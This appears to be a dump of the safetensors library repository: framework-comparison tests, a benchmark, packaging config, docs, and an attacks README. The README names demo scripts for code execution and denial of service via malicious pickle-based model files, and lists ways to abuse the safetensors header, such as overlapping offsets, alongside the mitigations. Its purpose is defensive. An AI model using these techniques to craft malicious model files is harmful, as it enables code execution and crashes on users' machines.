--------------------------------------------------------------------------------
1 | import unittest
2 |
3 | import numpy as np
4 |
5 | from safetensors import _safe_open_handle
6 | from safetensors.numpy import save_file, save
7 |
8 |
9 | class HandleTestCase(unittest.TestCase):
10 | def assertTensorEqual(self, tensors1, tensors2, equality_fn):
11 | self.assertEqual(tensors1.keys(), tensors2.keys(), "tensor keys don't match")
12 |
13 | for k, v1 in tensors1.items():
14 | v2 = tensors2[k]
15 |
16 | self.assertTrue(equality_fn(v1, v2), f"{k} tensors are different")
17 |
18 | def test_numpy_example(self):
19 | tensors = {"a": np.zeros((2, 2)), "b": np.zeros((2, 3), dtype=np.uint8)}
20 |
21 | save_file(tensors, "./out_np.safetensors")
22 |
23 | # Now loading
24 | loaded = {}
25 |         with open("./out_np.safetensors", "rb") as f:
26 | with _safe_open_handle(f, framework="np", device="cpu") as g:
27 | for key in g.keys():
28 | loaded[key] = g.get_tensor(key)
29 | self.assertTensorEqual(tensors, loaded, np.allclose)
30 |
31 | def test_fsspec(self):
32 | import fsspec
33 |
34 | tensors = {"a": np.zeros((2, 2)), "b": np.zeros((2, 3), dtype=np.uint8)}
35 |
36 | fs = fsspec.filesystem("file")
37 | byts = save(tensors)
38 | with fs.open("fs.safetensors", "wb") as f:
39 | f.write(byts)
40 | # Now loading
41 | loaded = {}
42 | with fs.open("fs.safetensors", "rb") as f:
43 | with _safe_open_handle(f, framework="np", device="cpu") as g:
44 | for key in g.keys():
45 | loaded[key] = g.get_tensor(key)
46 | self.assertTensorEqual(tensors, loaded, np.allclose)
47 |
48 | @unittest.skip("Will not work without s3 access")
49 | def test_fsspec_s3(self):
50 | import s3fs
51 |
52 | tensors = {"a": np.zeros((2, 2)), "b": np.zeros((2, 3), dtype=np.uint8)}
53 |
54 | s3 = s3fs.S3FileSystem(anon=True)
55 | byts = save(tensors)
56 | print(s3.ls("my-bucket"))
57 | with s3.open("out/fs.safetensors", "wb") as f:
58 | f.write(byts)
59 | # Now loading
60 | loaded = {}
61 | with s3.open("out/fs.safetensors", "rb") as f:
62 | with _safe_open_handle(f, framework="np", device="cpu") as g:
63 | for key in g.keys():
64 | loaded[key] = g.get_tensor(key)
65 | self.assertTensorEqual(tensors, loaded, np.allclose)
66 |
--------------------------------------------------------------------------------
/bindings/python/tests/test_mlx_comparison.py:
--------------------------------------------------------------------------------
1 | import platform
2 | import unittest
3 |
4 |
5 | HAS_MLX = False
6 | if platform.system() == "Darwin":
7 |     # MLX is only supported on macOS; guard the import so other
8 |     # platforms don't crash on it. These tests are skipped there anyway.
9 | try:
10 | import mlx.core as mx
11 |
12 | HAS_MLX = True
13 | except ImportError:
14 | pass
15 | if HAS_MLX:
16 | from safetensors import safe_open
17 | from safetensors.mlx import load_file, save_file
18 |
19 |
20 | # MLX only exists on Mac
21 | @unittest.skipIf(platform.system() != "Darwin", "MLX is not available on non-Mac platforms")
22 | @unittest.skipIf(not HAS_MLX, "Mlx is not available.")
23 | class LoadTestCase(unittest.TestCase):
24 | def setUp(self):
25 | data = {
26 | "test": mx.random.uniform(shape=(1024, 1024), dtype=mx.float32),
27 | "test2": mx.random.uniform(shape=(1024, 1024), dtype=mx.float32),
28 | "test3": mx.random.uniform(shape=(1024, 1024), dtype=mx.float32),
29 | "test4": mx.random.uniform(shape=(1024, 1024), dtype=mx.float32).astype(
30 | mx.complex64
31 | ),
32 | # This doesn't work because bfloat16 is not implemented
33 | # with similar workarounds as jax/tensorflow.
34 | # https://github.com/ml-explore/mlx/issues/1296
35 | # "test4": mx.random.uniform(shape=(1024, 1024), dtype=mx.bfloat16),
36 | }
37 | self.mlx_filename = "./tests/data/mlx_load.npz"
38 | self.sf_filename = "./tests/data/mlx_load.safetensors"
39 |
40 | mx.savez(self.mlx_filename, **data)
41 | save_file(data, self.sf_filename)
42 |
43 | def test_zero_sized(self):
44 | data = {
45 | "test": mx.zeros((2, 0), dtype=mx.float32),
46 | }
47 | local = "./tests/data/out_safe_flat_mmap_small2.safetensors"
48 | save_file(data.copy(), local)
49 | reloaded = load_file(local)
50 | # Empty tensor != empty tensor on numpy, so comparing shapes
51 | # instead
52 | self.assertEqual(data["test"].shape, reloaded["test"].shape)
53 |
54 | def test_deserialization_safe(self):
55 | weights = load_file(self.sf_filename)
56 |
57 | mlx_weights = mx.load(self.mlx_filename)
58 |
59 | for k, v in weights.items():
60 | tv = mlx_weights[k]
61 | self.assertTrue(mx.allclose(v, tv))
62 |
63 | def test_deserialization_safe_open(self):
64 | weights = {}
65 | with safe_open(self.sf_filename, framework="mlx") as f:
66 | for k in f.keys():
67 | weights[k] = f.get_tensor(k)
68 |
69 | mlx_weights = mx.load(self.mlx_filename)
70 |
71 | for k, v in weights.items():
72 | tv = mlx_weights[k]
73 | self.assertTrue(mx.allclose(v, tv))
74 |
--------------------------------------------------------------------------------
/bindings/python/benches/test_tf.py:
--------------------------------------------------------------------------------
1 | import os
2 | import tempfile
3 |
4 | import h5py
5 | import numpy as np
6 | import tensorflow as tf
7 |
8 | from safetensors.tensorflow import load_file, save_file
9 |
10 |
11 | def _load(filename, tensors=None, prefix=""):
12 |     if tensors is None:
13 |         tensors = {}
14 |     def visit(g, prefix):  # recurse with group objects; h5py.File needs a path
15 |         for k in g.keys():
16 |             if isinstance(g[k], h5py._hl.dataset.Dataset):
17 |                 key = k if not prefix else f"{prefix}_{k}"
18 |                 tensors[key] = tf.convert_to_tensor(np.array(g[k]))
19 |             else:
20 |                 visit(g[k], f"{prefix}_{k}")
21 |     with h5py.File(filename, "r") as f:
22 |         visit(f, prefix)
23 |     return tensors
24 | def _save(filename, tensors, prefix=""):
25 | with h5py.File(filename, "w") as f:
26 | for name, tensor in tensors.items():
27 | tensor = tensor.numpy()
28 | dset = f.create_dataset(name, tensor.shape, dtype=tensor.dtype)
29 | dset[:] = tensor
30 |
31 |
32 | def create_gpt2(n_layers: int):
33 | tensors = {}
34 | tensors["wte"] = tf.zeros((50257, 768))
35 | tensors["wpe"] = tf.zeros((1024, 768))
36 | for i in range(n_layers):
37 | tensors[f"h.{i}.ln_1.weight"] = tf.zeros((768,))
38 | tensors[f"h.{i}.ln_1.bias"] = tf.zeros((768,))
39 | tensors[f"h.{i}.attn.bias"] = tf.zeros((1, 1, 1024, 1024))
40 | tensors[f"h.{i}.attn.c_attn.weight"] = tf.zeros((768, 2304))
41 | tensors[f"h.{i}.attn.c_attn.bias"] = tf.zeros((2304))
42 | tensors[f"h.{i}.attn.c_proj.weight"] = tf.zeros((768, 768))
43 | tensors[f"h.{i}.attn.c_proj.bias"] = tf.zeros((768))
44 | tensors[f"h.{i}.ln_2.weight"] = tf.zeros((768))
45 | tensors[f"h.{i}.ln_2.bias"] = tf.zeros((768))
46 | tensors[f"h.{i}.mlp.c_fc.weight"] = tf.zeros((768, 3072))
47 | tensors[f"h.{i}.mlp.c_fc.bias"] = tf.zeros((3072))
48 | tensors[f"h.{i}.mlp.c_proj.weight"] = tf.zeros((3072, 768))
49 | tensors[f"h.{i}.mlp.c_proj.bias"] = tf.zeros((768))
50 | tensors["ln_f.weight"] = tf.zeros((768))
51 | tensors["ln_f.bias"] = tf.zeros((768))
52 | return tensors
53 |
54 |
55 | def test_tf_tf_load(benchmark):
56 |     # Benchmark h5 loading into tensorflow
57 | weights = create_gpt2(12)
58 | with tempfile.NamedTemporaryFile(delete=False) as f:
59 | _save(f.name, weights)
60 | result = benchmark(_load, f.name)
61 | os.unlink(f.name)
62 |
63 | for k, v in weights.items():
64 | tv = result[k]
65 | assert np.allclose(v, tv)
66 |
67 |
68 | def test_tf_sf_load(benchmark):
69 |     # Benchmark safetensors loading into tensorflow
70 | weights = create_gpt2(12)
71 | with tempfile.NamedTemporaryFile(delete=False) as f:
72 | save_file(weights, f.name)
73 | result = benchmark(load_file, f.name)
74 | os.unlink(f.name)
75 |
76 | for k, v in weights.items():
77 | tv = result[k]
78 | assert np.allclose(v, tv)
79 |
--------------------------------------------------------------------------------
/bindings/python/tests/test_flax_comparison.py:
--------------------------------------------------------------------------------
1 | import platform
2 | import unittest
3 | import sys
4 |
5 |
6 | if platform.system() != "Windows":
7 |     # Jax is not supported on Windows; guard the import so we don't
8 |     # crash there. These tests are skipped on Windows anyway.
9 | import jax.numpy as jnp
10 | from jax import random
11 | from flax.serialization import msgpack_restore, msgpack_serialize
12 | from safetensors import safe_open
13 | from safetensors.flax import load_file, save_file
14 |
15 |
16 | # Jax does not exist on Windows
17 | @unittest.skipIf(platform.system() == "Windows", "Flax is not available on Windows")
18 | class LoadTestCase(unittest.TestCase):
19 | def setUp(self):
20 | key = random.key(0)
21 | data = {
22 | "test": random.normal(key, (1024, 1024), dtype=jnp.float32),
23 | "test2": random.normal(key, (1024, 1024), dtype=jnp.float16),
24 | "test3": random.normal(key, (1024, 1024), dtype=jnp.bfloat16),
25 | "test4": random.normal(key, (1024, 1024), dtype=jnp.complex64),
26 | }
27 | self.flax_filename = "./tests/data/flax_load.msgpack"
28 | self.sf_filename = "./tests/data/flax_load.safetensors"
29 |
30 | serialized = msgpack_serialize(data)
31 | with open(self.flax_filename, "wb") as f:
32 | f.write(serialized)
33 |
34 | save_file(data, self.sf_filename)
35 |
36 | def test_zero_sized(self):
37 | data = {
38 | "test": jnp.zeros((2, 0), dtype=jnp.float32),
39 | }
40 | local = "./tests/data/out_safe_flat_mmap_small2.safetensors"
41 | save_file(data.copy(), local)
42 | reloaded = load_file(local)
43 | # Empty tensor != empty tensor on numpy, so comparing shapes
44 | # instead
45 | self.assertEqual(data["test"].shape, reloaded["test"].shape)
46 |
47 | def test_deserialization_safe(self):
48 | weights = load_file(self.sf_filename)
49 |
50 | with open(self.flax_filename, "rb") as f:
51 | data = f.read()
52 | flax_weights = msgpack_restore(data)
53 |
54 | for k, v in weights.items():
55 | tv = flax_weights[k]
56 | self.assertTrue(jnp.allclose(v, tv))
57 |
58 | def test_deserialization_safe_open(self):
59 | weights = {}
60 | with safe_open(self.sf_filename, framework="flax") as f:
61 | for k in f.keys():
62 | weights[k] = f.get_tensor(k)
63 |
64 | with open(self.flax_filename, "rb") as f:
65 | data = f.read()
66 | flax_weights = msgpack_restore(data)
67 |
68 | for k, v in weights.items():
69 | tv = flax_weights[k]
70 | self.assertTrue(jnp.allclose(v, tv))
71 |
72 | def test_loading_without_ml_dtype(self):
73 | # This does not work as we cannot unload
74 | # modules, copy this into its own file to test.
75 | # https://github.com/huggingface/safetensors/issues/598
76 | sys.modules.pop("ml_dtypes", None)
77 | with safe_open(self.sf_filename, framework="flax") as f:
78 | f.get_tensor("test3")
79 |
--------------------------------------------------------------------------------
/bindings/python/pyproject.toml:
--------------------------------------------------------------------------------
1 | [project]
2 | name = 'safetensors'
3 | requires-python = '>=3.9'
4 | authors = [
5 | {name = 'Nicolas Patry', email = 'patry.nicolas@protonmail.com'}
6 | ]
7 | classifiers = [
8 | "Development Status :: 5 - Production/Stable",
9 | "Intended Audience :: Developers",
10 | "Intended Audience :: Education",
11 | "Intended Audience :: Science/Research",
12 | "License :: OSI Approved :: Apache Software License",
13 | "Operating System :: OS Independent",
14 | "Programming Language :: Python :: 3",
15 | "Programming Language :: Python :: 3.7",
16 | "Programming Language :: Python :: 3.8",
17 | "Programming Language :: Python :: 3.9",
18 | "Programming Language :: Python :: 3.10",
19 | "Topic :: Scientific/Engineering :: Artificial Intelligence",
20 | "Typing :: Typed",
21 | ]
22 | license = { file = "LICENSE" }
23 | dynamic = [
24 | 'description',
25 | 'readme',
26 | 'version',
27 | ]
28 |
29 | [project.urls]
30 | Homepage = 'https://github.com/huggingface/safetensors'
31 | Source = 'https://github.com/huggingface/safetensors'
32 |
33 | [project.optional-dependencies]
34 | numpy = ["numpy>=1.21.6"]
35 | torch = [
36 | "packaging",
37 | "safetensors[numpy]",
38 | "torch>=1.10",
39 | ]
40 | tensorflow = [
41 | "safetensors[numpy]",
42 | "tensorflow>=2.11.0",
43 | ]
44 | # pinned tf version for doc-builder
45 | pinned-tf = [
46 | "safetensors[numpy]",
47 | "tensorflow==2.18.0",
48 | ]
49 | jax = [
50 | "safetensors[numpy]",
51 | "flax>=0.6.3",
52 | "jax>=0.3.25",
53 | "jaxlib>=0.3.25",
54 | ]
55 | mlx = [
56 | "mlx>=0.0.9",
57 | ]
58 | paddlepaddle = [
59 | "safetensors[numpy]",
60 | "paddlepaddle>=2.4.1",
61 | ]
62 | quality = [
63 | "ruff", # after updating to black 2023, also update Python version in pyproject.toml to 3.7
64 | ]
65 | testing = [
66 | "safetensors[numpy]",
67 | "h5py>=3.7.0",
68 | "huggingface_hub>=0.12.1",
69 | "setuptools_rust>=1.5.2",
70 | "pytest>=7.2.0",
71 | "pytest-benchmark>=4.0.0",
72 | # "python-afl>=0.7.3",
73 | "hypothesis>=6.70.2",
74 | ]
75 | testingfree = [
76 | "safetensors[numpy]",
77 | "huggingface_hub>=0.12.1",
78 | "setuptools_rust>=1.5.2",
79 | "pytest>=7.2.0",
80 | "pytest-benchmark>=4.0.0",
81 | # "python-afl>=0.7.3",
82 | "hypothesis>=6.70.2",
83 | ]
84 | all = [
85 | "safetensors[torch]",
86 | "safetensors[numpy]",
87 | "safetensors[pinned-tf]",
88 | "safetensors[jax]",
89 | "safetensors[paddlepaddle]",
90 | "safetensors[quality]",
91 | "safetensors[testing]",
92 | ]
93 | dev = [
94 | "safetensors[all]",
95 | ]
96 |
97 |
98 | [build-system]
99 | requires = ["maturin>=1.0,<2.0"]
100 | build-backend = "maturin"
101 |
102 | [tool.maturin]
103 | python-source = "py_src"
104 | module-name = "safetensors._safetensors_rust"
105 | bindings = 'pyo3'
106 | features = ["pyo3/extension-module"]
107 |
108 | [tool.black]
109 | line-length = 119
110 | target-version = ['py35']
111 |
112 | [tool.setuptools.dynamic]
113 | readme = {file = ["README.rst"]}
114 |
--------------------------------------------------------------------------------
/attacks/README.md:
--------------------------------------------------------------------------------
1 | The purpose of this directory is to showcase various attacks (and to help you create your own).
2 |
3 |
4 | # Torch Arbitrary code execution
5 |
6 | Try it out. This will create a seemingly innocuous `torch_ace.pt` file.
7 | ```
8 | python torch_ace_create.py
9 | python torch_ace_get_pwned.py
10 | ```
11 |
12 | # PaddlePaddle Arbitrary code execution
13 |
14 | Try it out. This will create a seemingly innocuous `paddle_ace.pdparams` file.
15 | ```
16 | python paddle_ace_create.py
17 | python paddle_ace_get_pwned.py
18 | ```
19 |
20 | # Tensorflow (Keras) Arbitrary code execution (does not affect `transformers`)
21 |
22 | Try it out. This will create a seemingly innocuous `tf_ace.h5` file.
23 | ```
24 | python tf_ace_create.py
25 | python tf_ace_get_pwned.py
26 | ```
27 |
28 | # Torch Denial of Service (OOM kills the running process)
29 |
30 | Try it out. This will create a seemingly innocuous `torch_dos.pt` file.
31 | ```
32 | python torch_dos_create.py
33 | python torch_dos_get_pwned.py
34 | ```
35 |
36 | # Numpy Denial of Service (OOM kills the running process)
37 |
38 | Try it out. This will create a seemingly innocuous `numpy_dos.npz` file.
39 | ```
40 | python numpy_dos_create.py
41 | python numpy_dos_get_pwned.py
42 | ```
43 |
44 | # Safetensors abuse attempts
45 |
46 | In order to try and check the limits, we also try to abuse the current format.
47 | Please send ideas!
48 |
49 | A few things can be abused:
50 | - Proposal 1: The initial 8 bytes could declare a length that is too big with regard to the file. This crashes, and crashes early (out of bounds) (Attempt #1).
51 | - Proposal 2: The initial header is JSON, so an attacker could use a 4GB JSON file to delay the load. Debatable how much of an attack this is, but at least
52 | it's impossible to "bomb" (unlike the DOS attacks above, where the files are vastly smaller than their expanded version because of zip abuse).
53 | Various "protections" could be put in place, like a header proportion cap (the header should always be much smaller than the file); a sketch of such a check appears below. (Attempt #2)
54 | - Proposal 3: The offsets could be negative, or point outside the file. This all crashes by default.
55 | - Proposal 4: The offsets could overlap. ~~This is actually OK.~~ This is NOT ok.
56 | While testing Proposal 2, I realized that the tensors themselves were all allocated, which gave me an idea for a DOS exploit: a relatively small
57 | file, a few megs tops, defining many tensors on the same overlapping part of the file, is essentially a DOS attack. The mitigation is rather simple: we validate
58 | that the offsets are contiguous and non-overlapping.
59 | - Proposal 5: The offsets could mismatch the declared shapes + dtype. This is validated against.
60 | - Proposal 6: The file being mmapped could be modified while it's open (but an attacker with access to your filesystem means you're already pwned).
61 | - Proposal 7: serde JSON deserialization abuse (nothing so far: https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=serde). That doesn't mean there isn't a flaw. The same goes for the actual compiled Rust binary.
62 |
63 | ```
64 | python safetensors_abuse_attempt_1.py
65 | python safetensors_abuse_attempt_2.py
66 | python safetensors_abuse_attempt_3.py
67 | ```
68 |
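As a rough sketch of the checks discussed in Proposals 2 and 4 (an illustration only, not the library's actual Rust validation), assuming the documented layout of 8 little-endian length bytes followed by a JSON header; the `max_header_ratio` threshold is a hypothetical knob:

```python
import json
import os
import struct


def sanity_check(path, max_header_ratio=0.5):
    size = os.path.getsize(path)
    with open(path, "rb") as f:
        (header_size,) = struct.unpack("<Q", f.read(8))
        # Proposals 1/2: the header must fit in the file and stay
        # proportionate to it.
        if header_size > (size - 8) * max_header_ratio:
            raise ValueError(f"suspicious header size: {header_size}")
        header = json.loads(f.read(header_size))
    spans = sorted(
        info["data_offsets"]
        for name, info in header.items()
        if name != "__metadata__"
    )
    # Proposal 4: offsets must be contiguous and non-overlapping.
    end = 0
    for start, stop in spans:
        if start != end or stop < start:
            raise ValueError("offsets overlap or leave gaps")
        end = stop
    if end != size - 8 - header_size:
        raise ValueError("data region size mismatch")
```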
--------------------------------------------------------------------------------
/bindings/python/tests/test_tf_comparison.py:
--------------------------------------------------------------------------------
1 | import unittest
2 |
3 | import h5py
4 | import numpy as np
5 | import tensorflow as tf
6 |
7 | from safetensors import safe_open
8 | from safetensors.tensorflow import load_file, save_file
9 |
10 |
11 | def _load(f, tensors=None, prefix=""):
12 | if tensors is None:
13 | tensors = {}
14 | for k in f.keys():
15 | if isinstance(f[k], h5py._hl.dataset.Dataset):
16 | key = k if not prefix else f"{prefix}_{k}"
17 | tensors[key] = tf.convert_to_tensor(np.array(f[k]))
18 | else:
19 | tensors.update(_load(f[k], tensors, prefix=f"{prefix}_{k}"))
20 | return tensors
21 |
22 |
23 | def _save(f, tensors, prefix=""):
24 | for name, tensor in tensors.items():
25 | tensor = tensor.numpy()
26 | dset = f.create_dataset(name, tensor.shape, dtype=tensor.dtype)
27 | dset[:] = tensor
28 |
29 |
30 | class SafeTestCase(unittest.TestCase):
31 | def setUp(self):
32 | data = {
33 | "test": tf.zeros((1024, 1024), dtype=tf.float32),
34 | "test2": tf.zeros((1024, 1024), dtype=tf.float32),
35 | "test3": tf.zeros((1024, 1024), dtype=tf.float32),
36 | "test4": tf.zeros((1024, 1024), dtype=tf.complex64),
37 | }
38 | self.tf_filename = "./tests/data/tf_load.h5"
39 | self.sf_filename = "./tests/data/tf_load.safetensors"
40 |
41 | with h5py.File(self.tf_filename, "w") as f:
42 | _save(f, data)
43 | save_file(data, self.sf_filename)
44 |
45 | def test_zero_sized(self):
46 | data = {
47 | "test": tf.zeros((2, 0), dtype=tf.float32),
48 | }
49 | local = "./tests/data/out_safe_flat_mmap_small2.safetensors"
50 | save_file(data.copy(), local)
51 | reloaded = load_file(local)
52 | # Empty tensor != empty tensor on numpy, so comparing shapes
53 | # instead
54 | self.assertEqual(data["test"].shape, reloaded["test"].shape)
55 |
56 | def test_deserialization_safe(self):
57 | weights = load_file(self.sf_filename)
58 |
59 | with h5py.File(self.tf_filename, "r") as f:
60 | tf_weights = _load(f)
61 |
62 | for k, v in weights.items():
63 | tv = tf_weights[k]
64 | self.assertTrue(np.allclose(v, tv))
65 |
66 | def test_bfloat16(self):
67 | data = {
68 | "test": tf.random.normal((1024, 1024), dtype=tf.bfloat16),
69 | }
70 | save_file(data, self.sf_filename)
71 | weights = {}
72 | with safe_open(self.sf_filename, framework="tf") as f:
73 | for k in f.keys():
74 | weights[k] = f.get_tensor(k)
75 |
76 | for k, v in weights.items():
77 | tv = data[k]
78 | self.assertTrue(tf.experimental.numpy.allclose(v, tv))
79 |
80 | def test_deserialization_safe_open(self):
81 | weights = {}
82 | with safe_open(self.sf_filename, framework="tf") as f:
83 | for k in f.keys():
84 | weights[k] = f.get_tensor(k)
85 |
86 | with h5py.File(self.tf_filename, "r") as f:
87 | tf_weights = _load(f)
88 |
89 | for k, v in weights.items():
90 | tv = tf_weights[k]
91 | self.assertTrue(np.allclose(v, tv))
92 |
--------------------------------------------------------------------------------
/docs/source/speed.mdx:
--------------------------------------------------------------------------------
1 | # Speed Comparison
2 |
3 |
4 |
9 |
10 |
11 | `Safetensors` is really fast. Let's compare it against `PyTorch` by loading [gpt2](https://huggingface.co/gpt2) weights. To run the [GPU benchmark](#gpu-benchmark), make sure your machine has a GPU, or that you have selected a `GPU runtime` if you are using Google Colab.
12 |
13 | Before you begin, make sure you have all the necessary libraries installed:
14 |
15 | ```bash
16 | pip install safetensors huggingface_hub torch
17 | ```
18 |
19 | Let's start by importing all the packages that will be used:
20 |
21 | ```py
22 | >>> import os
23 | >>> import datetime
24 | >>> from huggingface_hub import hf_hub_download
25 | >>> from safetensors.torch import load_file
26 | >>> import torch
27 | ```
28 |
29 | Download safetensors & torch weights for gpt2:
30 |
31 | ```py
32 | >>> sf_filename = hf_hub_download("gpt2", filename="model.safetensors")
33 | >>> pt_filename = hf_hub_download("gpt2", filename="pytorch_model.bin")
34 | ```
35 |
36 | ### CPU benchmark
37 |
38 | ```py
39 | >>> start_st = datetime.datetime.now()
40 | >>> weights = load_file(sf_filename, device="cpu")
41 | >>> load_time_st = datetime.datetime.now() - start_st
42 | >>> print(f"Loaded safetensors {load_time_st}")
43 |
44 | >>> start_pt = datetime.datetime.now()
45 | >>> weights = torch.load(pt_filename, map_location="cpu")
46 | >>> load_time_pt = datetime.datetime.now() - start_pt
47 | >>> print(f"Loaded pytorch {load_time_pt}")
48 |
49 | >>> print(f"on CPU, safetensors is faster than pytorch by: {load_time_pt/load_time_st:.1f} X")
50 | Loaded safetensors 0:00:00.004015
51 | Loaded pytorch 0:00:00.307460
52 | on CPU, safetensors is faster than pytorch by: 76.6 X
53 | ```
54 |
55 | This speedup is due to the fact that this library avoids unnecessary copies by mapping the file directly; the principle is sketched below. It is actually possible to do it in [pure pytorch](https://gist.github.com/Narsil/3edeec2669a5e94e4707aa0f901d2282).
56 | The speedup shown here was measured on:
57 | * OS: Ubuntu 18.04.6 LTS
58 | * CPU: Intel(R) Xeon(R) CPU @ 2.00GHz
59 |
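To see the mmap principle in isolation, here is a minimal sketch (not `safetensors`' actual code) of a zero-copy read with numpy: the array aliases the memory-mapped pages instead of copying them. The `offset`/`count` values here are hypothetical stand-ins for what the real header declares.

```py
>>> import mmap
>>> import numpy as np

>>> # Map the file once; the OS pages data in lazily on first access.
>>> f = open(sf_filename, "rb")
>>> mm = mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ)

>>> # Hypothetical offset/count, as a real loader would read from the header.
>>> tensor = np.frombuffer(mm, dtype=np.float32, count=768 * 768, offset=8 + 4096)
```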
60 |
61 | ### GPU benchmark
62 |
63 | ```py
64 | >>> # This is required because this feature hasn't been fully verified yet, but
65 | >>> # it's been tested on many different environments
66 | >>> os.environ["SAFETENSORS_FAST_GPU"] = "1"
67 |
68 | >>> # CUDA startup out of the measurement
69 | >>> torch.zeros((2, 2)).cuda()
70 |
71 | >>> start_st = datetime.datetime.now()
72 | >>> weights = load_file(sf_filename, device="cuda:0")
73 | >>> load_time_st = datetime.datetime.now() - start_st
74 | >>> print(f"Loaded safetensors {load_time_st}")
75 |
76 | >>> start_pt = datetime.datetime.now()
77 | >>> weights = torch.load(pt_filename, map_location="cuda:0")
78 | >>> load_time_pt = datetime.datetime.now() - start_pt
79 | >>> print(f"Loaded pytorch {load_time_pt}")
80 |
81 | >>> print(f"on GPU, safetensors is faster than pytorch by: {load_time_pt/load_time_st:.1f} X")
82 | Loaded safetensors 0:00:00.165206
83 | Loaded pytorch 0:00:00.353889
84 | on GPU, safetensors is faster than pytorch by: 2.1 X
85 | ```
86 |
87 | The speedup works because this library is able to skip unnecessary CPU allocations. It is unfortunately not replicable in pure pytorch as far as we know. The library works by memory mapping the file, creating an empty tensor with pytorch, and calling `cudaMemcpy` directly to move the data onto the GPU; a rough illustration follows below.
88 | The speedup shown here was measured on:
89 | * OS: Ubuntu 18.04.6 LTS.
90 | * GPU: Tesla T4
91 | * Driver Version: 460.32.03
92 | * CUDA Version: 11.2
93 |
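As a rough illustration of that idea (a sketch only; the library does this from Rust via `cudaMemcpy`, which pure pytorch cannot fully replicate): allocate the destination tensor directly on the GPU, then copy the source bytes into it, skipping the intermediate CPU tensor that `torch.load` would materialize.

```py
>>> # Stand-in for a memory-mapped CPU view of one tensor's bytes.
>>> cpu_view = torch.zeros((1024, 1024), dtype=torch.float32)

>>> # Allocate on the GPU and copy straight into it.
>>> gpu_tensor = torch.empty((1024, 1024), dtype=torch.float32, device="cuda:0")
>>> gpu_tensor.copy_(cpu_view, non_blocking=True)
>>> torch.cuda.synchronize()
```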
--------------------------------------------------------------------------------
/docs/source/index.mdx:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | # Safetensors
9 |
10 | Safetensors is a new, simple format for storing tensors safely (as opposed to pickle) while remaining fast (zero-copy). Safetensors is really [fast 🚀](./speed).
11 |
12 | ## Installation
13 |
14 | with pip:
15 | ```
16 | pip install safetensors
17 | ```
18 |
19 | with conda:
20 | ```
21 | conda install -c huggingface safetensors
22 | ```
23 |
24 | ## Usage
25 |
26 | ### Load tensors
27 |
28 | ```python
29 | from safetensors import safe_open
30 |
31 | tensors = {}
32 | with safe_open("model.safetensors", framework="pt", device=0) as f:
33 | for k in f.keys():
34 | tensors[k] = f.get_tensor(k)
35 | ```
36 |
37 | Loading only part of the tensors (useful when running on multiple GPUs):
38 |
39 | ```python
40 | from safetensors import safe_open
41 |
42 | tensors = {}
43 | with safe_open("model.safetensors", framework="pt", device=0) as f:
44 | tensor_slice = f.get_slice("embedding")
45 | vocab_size, hidden_dim = tensor_slice.get_shape()
46 | tensor = tensor_slice[:, :hidden_dim]
47 | ```
48 |
49 | ### Save tensors
50 |
51 | ```python
52 | import torch
53 | from safetensors.torch import save_file
54 |
55 | tensors = {
56 | "embedding": torch.zeros((2, 2)),
57 | "attention": torch.zeros((2, 3))
58 | }
59 | save_file(tensors, "model.safetensors")
60 | ```
61 |
62 | ## Format
63 |
64 | Let's say you have a safetensors file named `model.safetensors`; it will have the following internal format:
65 |
66 |
67 |
68 |
69 |
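The header can be inspected with a few lines of Python, following the documented layout: the first 8 bytes are a little-endian `u64` giving the size of a JSON header, which maps each tensor name to its `dtype`, `shape` and `data_offsets` within the byte buffer that follows (plus an optional `__metadata__` entry).

```python
import json
import struct

with open("model.safetensors", "rb") as f:
    (header_size,) = struct.unpack("<Q", f.read(8))
    header = json.loads(f.read(header_size))

for name, info in header.items():
    if name != "__metadata__":
        print(name, info["dtype"], info["shape"], info["data_offsets"])
```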
70 | ## Featured Projects
71 |
72 | Safetensors is being used widely at leading AI enterprises, such as [Hugging Face](https://huggingface.co/), [EleutherAI](https://www.eleuther.ai/), and [StabilityAI](https://stability.ai/). Here is a non-exhaustive list of projects that are using safetensors:
73 |
74 | * [huggingface/transformers](https://github.com/huggingface/transformers)
75 | * [ml-explore/mlx](https://github.com/ml-explore/mlx)
76 | * [huggingface/candle](https://github.com/huggingface/candle)
77 | * [AUTOMATIC1111/stable-diffusion-webui](https://github.com/AUTOMATIC1111/stable-diffusion-webui)
78 | * [Llama-cpp](https://github.com/ggerganov/llama.cpp/blob/e6a46b0ed1884c77267dc70693183e3b7164e0e0/convert.py#L537)
79 | * [microsoft/TaskMatrix](https://github.com/microsoft/TaskMatrix)
80 | * [hpcaitech/ColossalAI](https://github.com/hpcaitech/ColossalAI)
81 | * [huggingface/pytorch-image-models](https://github.com/huggingface/pytorch-image-models)
82 | * [CivitAI](https://civitai.com/)
83 | * [huggingface/diffusers](https://github.com/huggingface/diffusers)
84 | * [coreylowman/dfdx](https://github.com/coreylowman/dfdx)
85 | * [invoke-ai/InvokeAI](https://github.com/invoke-ai/InvokeAI)
86 | * [oobabooga/text-generation-webui](https://github.com/oobabooga/text-generation-webui)
87 | * [Sanster/lama-cleaner](https://github.com/Sanster/lama-cleaner)
88 | * [PaddlePaddle/PaddleNLP](https://github.com/PaddlePaddle/PaddleNLP)
89 | * [AIGC-Audio/AudioGPT](https://github.com/AIGC-Audio/AudioGPT)
90 | * [brycedrennan/imaginAIry](https://github.com/brycedrennan/imaginAIry)
91 | * [comfyanonymous/ComfyUI](https://github.com/comfyanonymous/ComfyUI)
92 | * [LianjiaTech/BELLE](https://github.com/LianjiaTech/BELLE)
93 | * [alvarobartt/safejax](https://github.com/alvarobartt/safejax)
94 | * [MaartenGr/BERTopic](https://github.com/MaartenGr/BERTopic)
95 | * [rachthree/safestructures](https://github.com/rachthree/safestructures)
96 | * [justinchuby/onnx-safetensors](https://github.com/justinchuby/onnx-safetensors)
97 |
--------------------------------------------------------------------------------
/bindings/python/tests/test_threadable.py:
--------------------------------------------------------------------------------
1 | import unittest
2 | from concurrent import futures
3 | import threading
4 | import numpy as np
5 | from safetensors import serialize_file
6 | from safetensors.numpy import load_file
7 | import time
8 | import os
9 |
10 |
11 | class TestCase(unittest.TestCase):
12 | def test_serialize_file_releases_gil(self):
13 | """Test that serialize_file releases the GIL and can run concurrently."""
14 | # Create large numpy arrays to ensure serialization takes measurable time
15 | # Keep them alive throughout the test since we pass raw pointers
16 | tensor_a = np.random.randn(2000, 20000).astype(np.float32)
17 | tensor_b = np.random.randint(0, 128, (20000, 2000), dtype=np.int8)
18 |
